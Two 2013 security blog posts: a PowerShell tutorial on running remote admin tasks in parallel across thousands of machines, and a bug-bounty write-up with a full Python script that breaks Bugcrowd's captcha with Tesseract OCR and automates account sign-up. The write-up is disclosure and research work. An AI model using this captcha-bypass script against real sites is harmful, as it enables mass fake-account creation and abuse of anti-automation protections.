Friday, 20 December 2013

Powershell: Threading

Having recently got my head around basic Powershell I wanted to share some of the lessons I'd learnt. In this first post I'll talk about Powershell threading and performing tasks on an enterprise scale.


Getting Started

I'm not going to cover how to install and setup Powershell/WinRM. There are a lot of good posts out there already, for example:

http://blog.powershell.no/2010/03/04/enable-and-configure-windows-powershell-remoting-using-group-policy/

In a nutshell, you need to create a GPO to enable the WinRM service or if you want to test locally, just start the WinRM (Windows Remote Management) service. To run commands you'll need to have Powershell installed (Powershell 2.0 is included with Win7 by default), i'd recommend updating to Powershell 3.


Scaling up your Powershell

When running a script across thousands of machines I found three factors significantly affected the total run time. The first was how well I could get the tasks to run in parallel, the second was the efficiency of my code and the third was how much work I could offload to remote machines.

Efficiently running tasks in parallel was the biggest issue so in this post I'll cover the main parallel/off-loading techniques:
  • Invoke-Command
  • Jobs
  • Runspace Pooling
But first I wanted to briefly mention efficient coding.


Creating efficient scripts

In every language efficient coding can significantly affect the speed of and resources used by your scripts. This is particularly important when trying to scale a script across many machines as any inefficiencies are magnified.

I found the following helped improve my Powershell code performance:
  • Using Powershell built-in functions (cmdlets) wherever possible 
  • Using piping as much as possible
  • Minimizing creation/usage of new variables/files/objects
  • Avoiding searching or iterating over large data sets
  • Performing operations in parallel
For example to count the occurrences of a string in a 2MB text file, you don't want to do something crazy like this:

$i=0;Get-Content c:\temp\test.txt|ForEach {if($_ -eq 123){$i++}};Write-host $i

During testing the above took 8 seconds. The following code is cleaner but still took 7 seconds:

(Get-Content c:\temp\test.txt |Where {$_ -match "123"}| Measure-Object -Line).Lines

In this instance, the fastest way to search is by using Select-String, which in testing took less than a second! Using a single cmdlet and it's built-in parameters made this the most efficient option.

@(Select-String -Path c:\temp\test.txt -pattern 123).count

So how can we execute this in parallel across thousands of machines?


Invoke-Command

Invoke-command offers a simple way to execute commands on multiple remote machines in parallel.

http://technet.microsoft.com/en-us/library/hh849719.aspx

The SANS blog and Technet links below give some great explanations about why it's useful:

http://computer-forensics.sans.org/blog/2013/09/03/the-power-of-powershell-remoting

http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/23/an-introduction-to-powershell-remoting-part-one.aspx

I found Invoke-Command an ok option for simple one off commands but unsuitable for more complex interactive scripts. By design you provide code to be executed on the remote machine and once complete you are given the result. I couldn't find a way to perform interactive actions or easily get/push data (see double-hop problem). I also couldn't find a clean way to handle errors for non-accessible/offline machines (suggestions are welcome!).

As an example here's a script to check the status of a service on multiple machines:

Invoke-Command –ComputerName (Get-Content "C:\Temp\computers.txt") –ScriptBlock {Get-Service -Name WPCSvc} -ThrottleLimit 50 -ErrorAction continue

Unsatisfied with Invoke-Command I decided to look for alternative techniques.


Powershell Jobs

When you Google Powershell and threading everyone tells you to use Jobs as they are Powershell's answer to threads. So that's what I did, using the script at the link below I implemented a job creating function, a job management function and set my script going.

http://webcache.googleusercontent.com/search?q=cache:yFjkpkw8lT4J:www.get-blog.com/%3Fp%3D22

Something like this:

$MaxThreads = 20
$SleepTimer = 1000
$Computers = Get-Content "C:\Temp\computers.txt"

ForEach ($Computer in $Computers){
    While (@(Get-Job -state running).count -ge $MaxThreads){      
    Start-Sleep -Milliseconds $SleepTimer
    }

    Start-Job -scriptblock {
        if(Test-Path \\$($args[0])\C$ -ErrorAction silentlycontinue){
            #Do something
        } else{
            "Machine not accessible"
        }
    } -ArgumentList $Computer -Name "$($Computer)job" | Out-Null
}

While (@(Get-Job -State Running).count -gt 0){
    Start-Sleep -Milliseconds $SleepTimer
}

ForEach($Job in Get-Job){
    Receive-Job -Job $Job
    Remove-job -Force $Job
}

The positive with this script is that you can use -ComputerName remote execution and GetWMIObject instead of Invoke-Command to run commands interactively and in parallel. The negative is that it took a long long time to run. I'm not sure whether Powershell has a cap on the number of concurrent jobs or whether jobs are just inefficient. Either way jobs were slow. So I went back to Google.


Runspace pooling to the rescue!

After wading through all of the Jobs posts I finally got to a technique called runspace pooling. By calling CreateRunspacePool it is possible to create multiple runspaces pools which effectively work as threads.

http://msdn.microsoft.com/en-us/library/system.management.automation.runspaces.runspacefactory.createrunspacepool(v=vs.85).aspx

With one pool per host and all of the pools operating simultaneously the script was very fast. It's possible to include your own runspace code within your script but I found the simpler solution was to use Tome Tanasovski's threading function. I'd recommend checking out his post here for the full story and script:

http://powertoe.wordpress.com/2012/05/03/foreach-parallel/

Using Tome's runspace pooling code I found it easy to create scripts that ran quickly, didn't encounter double-hop problems and handled errors as expected.


Putting Powershell Threading to Work

To give a quick example, I created a script below that will check the status of a service and if it's disabled it will enable it:

$computer = "testhost"
$myservice = Get-Service -computerName $computer -Name "WPCSvc"| Where-Object {$_.status -eq "Stopped"}
if($myservice){
 "Service is stopped. Starting now!"
 Set-Service WPCSvc -startuptype "Automatic" -computerName $computer 
 Start-Service -inputobject $myservice
 "Service started!"
}

I've used the Get-Service cmdlet to first get the status of a specific service. If the service was stopped I'd set the start type to automatic and start the service.

So that's for one machine, if we want to run this on thousands of machines we just need to combine the code with Tome's runspace script:

function ForEach-Parallel {
    param(
        [Parameter(Mandatory=$true,position=0)]
        [System.Management.Automation.ScriptBlock] $ScriptBlock,
        [Parameter(Mandatory=$true,ValueFromPipeline=$true)]
        [PSObject]$InputObject,
        [Parameter(Mandatory=$false)]
        [int]$MaxThreads=5
    )
    BEGIN {
        $iss = [system.management.automation.runspaces.initialsessionstate]::CreateDefault()
        $pool = [Runspacefactory]::CreateRunspacePool(1, $maxthreads, $iss, $host)
        $pool.open()
        $threads = @()
        $ScriptBlock = $ExecutionContext.InvokeCommand.NewScriptBlock("param(`$_)`r`n" + $Scriptblock.ToString())
    }
    PROCESS {
        $powershell = [powershell]::Create().addscript($scriptblock).addargument($InputObject)
        $powershell.runspacepool=$pool
        $threads+= @{
            instance = $powershell
            handle = $powershell.begininvoke()
        }
    }
    END {
        $notdone = $true
        while ($notdone) {
            $notdone = $false
            for ($i=0; $i -lt $threads.count; $i++) {
                $thread = $threads[$i]
                if ($thread) {
                    if ($thread.handle.iscompleted) {
                        $thread.instance.endinvoke($thread.handle)
                        $thread.instance.dispose()
                        $threads[$i] = $null
                    }
                    else {
                        $notdone = $true
                    }
                }
            }
        }
    }
}

$ErrorActionPreference = "Stop";

$ComputerList = $(Read-Host "Enter the Location of the computerlist")
$Computers = Get-Content $ComputerList
$Computers |ForEach-Parallel -MaxThreads 100{
 try{
  if(Test-Path \\$_\C$ -ErrorAction silentlycontinue){
   $test = Get-Service -computerName $_ -Name "WPCSvc"| Where-Object {$_.status -eq "Stopped"}
   if($test){
    "Service stopped on: " + $_
    Set-Service WPCSvc -startuptype "Automatic" -computerName $_ 
    Start-Service -inputobject $test
    "Service started on: " + $_
   }
  } else{
   $_ + " - Machine not accessible"
  }
 }
 Catch{
   "Caught an exception!"
 }
}

At first glance it might seem confusing but its dead simple. The whole first section is Tome's script and will handle the threading. My code starts with reading in a list of computers from text file. Then we pipe those machines to Tome's function "ForEach-Parallel". In the following section I've put the code that will execute in each runspace.

I've used the same Get-Service, Set-Service, Start-Service cmdlets as in my first example, this time round though I added a check to see if the machine was accessible using Test-Path and also error handling with a try/catch.


Final Thoughts

Threading is one of the most important features of any language and I was surprised how poorly it was implemented in Powershell. Being new to Powershell definitely didn't help but also the information online was pretty poor, no one really covered all of the techniques in one place or explained which was better.

Personally I found runspace pooling the fastest, the cleanest and easiest to use. Although Tome's script is a little bulky it makes threading simple. I would love to hear other people opinions on what worked best for them.

I'll hopefully be adding some more Powershell blog posts in the future. For more security orientated Powershell definitely check out PoshSec and Posh-SecMod

Pwndizzle out.

Thursday, 5 December 2013

Breaking Bugcrowd's Captcha with Python and Tesseract

In this post I'm going to talk about bypassing Bugcrowd's captcha using Python and Tesseract. This post was originally written for the Bugcrowd blog here: http://blog.bugcrowd.com/guest-blog-breaking-bugcrowds-captcha-pwndizzle/


A Bugcrowd Bounty

A while back Bugcrowd started a bounty for the main Bugcrowd site. While flicking through the site looking for issues I noticed they were using a pretty basic captcha. In certain sections of the site, for example account sign up, password reset and on multiple failed passwords, you were required to enter the captcha to verify you were human:

This in theory would prevent the automated use of these functions. But if I could find a way to bypass the captcha I could potentially abuse these functions.


So how do you bypass a captcha? 

If it's a home-grown captcha you may be lucky enough to find a logic flaw such as the captcha code being included on the current page or perhaps you can re-use a valid captcha more than once.

If you're dealing with a more sophisticated captcha you've got two options. Either you outsource the work to a developing country (http://krebsonsecurity.com/2012/01/virtual-sweatshops-defeat-bot-or-not-tests/) or you can try optical character recognition (OCR).  


OCR?

Assuming you don't choose to outsource the work, there are a few different OCR frameworks out there that you can use to automatically analyse an image and have it return you a list of characters. I found Tesseract (https://code.google.com/p/tesseract-ocr/) to be a good choice as it's engine has been pre-trained and it worked out of the box with decent results.

As the Bugcrowd captcha was so simple all I needed to do was enlarge the image before submitting to Tesseract for analysis to succeed most of the time. For other more complex captchas that use distorted characters or overlays to mask the text you will need to clean the image before submitting to Tesseract. Some examples can be found in the references below.


Weaponizing using Python

With a way to obtain the captcha value from the captcha image I decided to create a proof of concept script in Python that could automate account sign-up. Being the lazy security guy I am, I had a look on Google to see if someone else had already created a similar script and although there were captcha breaking scripts I couldn't find an example of a full attack. So instead I wrote my own.

The Bugcrowd sign-up process consisted of two requests, one to retrieve the sign-up page (containing captcha and csrf) and a second request to send sign-up data (username, email, password etc.) To automate the whole process the script would need to download a copy of the sign-up page, extract the csrf and captcha tokens, download and analyse the captcha then submit a sign-up request containing the following:


Using Python 3.3 I cobbled together the following:

# A script to bypass the Bugcrowd sign-up page captcha
# Created by @pwndizzle - http://pwndizzle.blogspot.com 

from PIL import Image
from urllib.error import *
from urllib.request import *
from urllib.parse import *
import re
import subprocess

def getpage():
    try:
        print("[+] Downloading Page");  
        site = urlopen("https://portal.bugcrowd.com/user/sign_up")
        site_html = site.read().decode("utf-8")
        global csrf
        #Parse page for CSRF token (string 43 characters long ending with =)  
        csrf = re.findall('[a-zA-Z0-9+/]{43}=', site_html)
        print ("-----CSRF Token: " + csrf[0])
        global ctoken
        #Parse page for captcha token (string 40 characters long)   
        ctoken = re.findall('[a-z0-9]{40}', site_html)
        print ("-----Captcha Token: " + ctoken[0])
    except URLError as e:
        print ("*****Error: Cannot retrieve URL*****");

 
def getcaptcha():
    try:
        print("[+] Downloading Captcha"); 
        captchaurl = "https://portal.bugcrowd.com/simple_captcha?code="+ctoken[0] 
        urlretrieve(captchaurl,'captcha1.png')
    except URLError as e:
        print ("*****Error: Cannot retrieve URL*****");


def resizer():
 print("[+] Resizing...");
 im1 = Image.open("captcha1.png")
 width, height = im1.size
 im2 = im1.resize((int(width*5), int(height*5)), Image.BICUBIC)
 im2.save("captcha2.png")

 
def tesseract():
    try:
        print("[+] Running Tesseract...");
        #Run Tesseract, -psm 8, tells Tesseract we are looking for a single word 
        subprocess.call(['C:\\Program Files (x86)\\Tesseract-OCR\\tesseract.exe', 'C:\\Python33\\captcha2.png', 'output', '-psm', '8'])
        f = open ("C:\Python33\output.txt","r")
        global cvalue
  #Remove whitespace and newlines from Tesseract output
        cvaluelines = f.read().replace(" ", "").split('\n')
        cvalue = cvaluelines[0]
        print("-----Captcha: " + cvalue); 
    except Exception as e:
        print ("Error: " + str(e))

  
def send():
    try:
        print("[+] Sending request...");
        user = "testuser99"
        params = {'utf8':'%E2%9C%93', 'authenticity_token': csrf[0], 'user[username]':user, 'user[email]':user+'@test.com', 'user[password]':'password123', 'user[password_confirmation]':'password123', 'captcha':cvalue,'captcha_key':ctoken[0],'agree_terms_conditions':'true'}
        data = urlencode(params).encode('utf-8')
        request = Request("https://portal.bugcrowd.com/user")
        #Send request and analyse response
        f = urlopen(request, data)
        response = f.read().decode('utf-8')
  #Check for error message
        fail = re.search('The following errors occurred', response)
        if fail:
            print("-----Account creation failed!")
        else:
            print ("-----Account created!")
    except Exception as e:
        print ("Error: " + str(e))

  
print("[+] Start!");
#Download page and parse data
getpage();
#Download captcha image
getcaptcha();
#Resize captcha image 
resizer();
#Need more filtering? Add subroutines here!
#Use Tesseract to analyse captcha image
tesseract();
#Send request to site containing form data and captcha
send();
print("[+] Finished!");


Running the script from the c:\Python33 folder against a Bugcrowd signup page with the following captcha:

I get the following output:


Awesome, so with one click the script can create an account. Add a for loop and make the username/email dynamic and we can sign up for as many accounts as we like, all automatically. So you're probably thinking "if it's that easy to bypass a captcha why isn't everyone doing it?". Well there are some important points to remember:

  •  Tesseract doesn't analyse the captcha correctly every time. With Bugcrowd's simple captcha I was getting about a 30% success rate.
  • Most sites don't use such a simple captcha and filtering noise can be tricky. A harder captcha, means a lower success rate, more requests and a greater chance of getting caught/locked out.
  • There could be server-side mitigations in place we don't know about. E.g. Each ip cannot create more than five accounts a day.
  • The impact of a captcha bypass and mitigations can vary greatly depending on what the captcha is trying to protect.


Final Thoughts

I like the concept of captchas, current machines struggle with optical recognition and an image check is all it takes to prevent automation. As demonstrated though simple letter/number captchas can be easy to break and everyday use can frustrate users. For me images of people/objects/scenes, like the friend captcha used by Facebook, or interactive captchas/mini-games like those offered by http://areyouahuman.com/ appear to be an interesting alternative that offer effective anti-automation (for now) with improved user experience.  

If you want to re-use the script it should work fine on other machines and sites but you'll need to change the URLs, the parsing logic and possibly apply image filters depending on the captcha your targeting. I built the script using Python 3.3 and Tesseract 3.02 with default installation locations on Windows 7.

For more information about breaking captchas with Python I'd definitely recommend checking out the following posts:

http://blog.c22.cc/2010/10/12/python-ocr-or-how-to-break-captchas/

http://www.debasish.in/2012/01/bypass-captcha-using-python-and.html

http://bokobok.fr/bypassing-a-captcha-with-python/

Also cleaning catpchas with Imagemagick looked interesting but I didn't get round to testing it:

http://www.imagemagick.org

Thanks to Bugcrowd for all their awesome work. I hope you guys have found this post useful. Questions and feedback are always appreciated so drop me a comment below :)

Pwndizzle out.